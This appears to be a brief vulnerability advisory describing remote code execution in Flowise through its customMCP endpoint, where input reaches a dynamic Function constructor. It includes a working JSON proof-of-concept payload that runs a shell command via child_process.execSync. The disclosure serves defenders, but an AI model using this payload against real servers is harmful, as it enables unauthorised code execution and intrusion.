Unintended dynamic code execution leads to remote code execution by network attackers
(,)
User-controlled input flows to an unsafe implementation of a dynamic Function constructor, allowing network attackers to run arbitrary unsandboxed JS code in the context of the host, by sending a simple POST request. Depending on the version of Flowise this could lead to either unauthenticated or authenticated remote code execution.
Send the following payload to the node-load-method/customMCP API endpoint -
{
"inputs":
{
"mcpServerConfig": "(global.process.mainModule.require('child_process').execSync('touch /tmp/foo'))"
},
"loadMethod": "listActions"
}
No mitigations are supplied for this issue